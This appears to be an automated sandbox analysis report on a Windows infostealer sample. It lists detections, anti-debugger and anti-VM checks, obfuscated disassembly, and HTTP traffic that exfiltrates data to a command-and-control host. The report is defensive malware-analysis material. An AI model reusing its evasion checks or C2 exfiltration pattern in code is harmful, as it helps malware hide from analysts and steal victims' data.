Windows Analysis Report
lolvgcpX19.exe

Overview

General Information

Sample name:lolvgcpX19.exe
renamed because original name is a hash value
Original sample name:605f4d4c3e2be9f71fe0974b6ce3c714.exe
Analysis ID:1581218
MD5:605f4d4c3e2be9f71fe0974b6ce3c714
SHA1:b361107308ff54acebd2221648551ea4ea60d679
SHA256:f455531a6a17ac4c13070b4dc22758990ec5c31dfb80f4a4f914745f66da3d2f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • lolvgcpX19.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\lolvgcpX19.exe" MD5: 605F4D4C3E2BE9F71FE0974B6CE3C714)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: lolvgcpX19.exeAvira: detected
Source: lolvgcpX19.exeVirustotal: Detection: 42%
Source: lolvgcpX19.exeReversingLabs: Detection: 44%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: lolvgcpX19.exeJoe Sandbox ML: detected
Source: lolvgcpX19.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00FEA5B0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEA7F0
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00FEB560
Source: lolvgcpX19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500650
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0104A8C0 recvfrom,0_2_0104A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500650
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:46:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:46:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: lolvgcpX19.exe, 00000000.00000002.2311257841.0000000000664000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295164881.0000000000664000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2294250532.0000000000661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: lolvgcpX19.exe, 00000000.00000003.2295074222.0000000000657000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311225236.0000000000659000.00000004.00000020.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000003.2295007979.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: lolvgcpX19.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: lolvgcpX19.exe, lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

System Summary

Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: .idata
Source: lolvgcpX19.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F875A0 appears 600 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC4FD0 appears 223 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F873F0 appears 102 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC5340 appears 41 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC4F40 appears 295 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 01137220 appears 90 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F871E0 appears 43 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F8CAA0 appears 62 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 010644A0 appears 64 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 0115CBC0 appears 94 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00FC50A0 appears 86 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F9CD40 appears 63 times
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: String function: 00F9CCD0 appears 53 times
Source: lolvgcpX19.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: lolvgcpX19.exeStatic PE information: Section: ywbalksd ZLIB complexity 0.994453125
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F8255D
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00F829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F829FF
Source: C:\Users\user\Desktop\lolvgcpX19.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\lolvgcpX19.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: lolvgcpX19.exeVirustotal: Detection: 42%
Source: lolvgcpX19.exeReversingLabs: Detection: 44%
Source: lolvgcpX19.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: lolvgcpX19.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: kernel.appcore.dllJump to behavior
Source: lolvgcpX19.exeStatic file information: File size 4502528 > 1048576
Source: lolvgcpX19.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: lolvgcpX19.exeStatic PE information: Raw size of ywbalksd is bigger than: 0x100000 < 0x1bee00

Data Obfuscation

Source: C:\Users\user\Desktop\lolvgcpX19.exeUnpacked PE file: 0.2.lolvgcpX19.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ywbalksd:EW;codissdg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ywbalksd:EW;codissdg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: lolvgcpX19.exeStatic PE information: real checksum: 0x44e622 should be: 0x45202a
Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: .idata
Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: ywbalksd
Source: lolvgcpX19.exeStatic PE information: section name: codissdg
Source: lolvgcpX19.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_013041D0 push eax; mov dword ptr [esp], edx0_2_013041D5
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01002340 push eax; mov dword ptr [esp], 00000000h0_2_01002343
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0103C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0103C743
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FC0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00FC0AC4
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FE1430 push eax; mov dword ptr [esp], 00000000h0_2_00FE1433
Source: lolvgcpX19.exeStatic PE information: section name: ywbalksd entropy: 7.955597758954747

Boot Survival

Source: C:\Users\user\Desktop\lolvgcpX19.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\lolvgcpX19.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\lolvgcpX19.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\lolvgcpX19.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\lolvgcpX19.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\lolvgcpX19.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\lolvgcpX19.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A632 second address: 183A63C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B98E5482Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A63C second address: 183A6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F7B9916151Ch 0x0000000f mov bx, ax 0x00000012 push 00000000h 0x00000014 movsx ebx, ax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7B99161518h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D37F9h] 0x00000039 xchg eax, esi 0x0000003a jmp 00007F7B9916151Eh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push ebx 0x00000043 jmp 00007F7B99161525h 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A6A7 second address: 183A6B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7B98E54826h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B524 second address: 183B52A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A7B0 second address: 183A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183A7B4 second address: 183A7BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B718 second address: 183B71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B71C second address: 183B720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D4C8 second address: 183D4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B720 second address: 183B726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D4D4 second address: 183D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7B98E54828h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ebx, esi 0x00000024 push 00000000h 0x00000026 ja 00007F7B98E54827h 0x0000002c push 00000000h 0x0000002e jmp 00007F7B98E54830h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F7B98E5482Fh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183B726 second address: 183B72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D769 second address: 183D76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183F76B second address: 183F76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D76D second address: 183D782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183D782 second address: 183D787 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 183F93B second address: 183F956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847D7E second address: 1847D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847D87 second address: 1847DA1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7B98E54834h 0x00000008 jmp 00007F7B98E5482Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847DA1 second address: 1847DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7B99161516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1847F1A second address: 1847F38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F7B98E5482Dh 0x0000000f jnp 00007F7B98E54826h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1852894 second address: 18528B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7B9916151Ch 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F7B99161516h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 185150F second address: 1851516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851B43 second address: 1851B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182C1BE second address: 182C1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182C1C2 second address: 182C1F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F7B99161516h 0x00000013 jmp 00007F7B9916151Dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851C73 second address: 1851C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jnc 00007F7B98E54826h 0x0000000e jmp 00007F7B98E54830h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1851C92 second address: 1851CBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161525h 0x00000007 push eax 0x00000008 jmp 00007F7B99161521h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
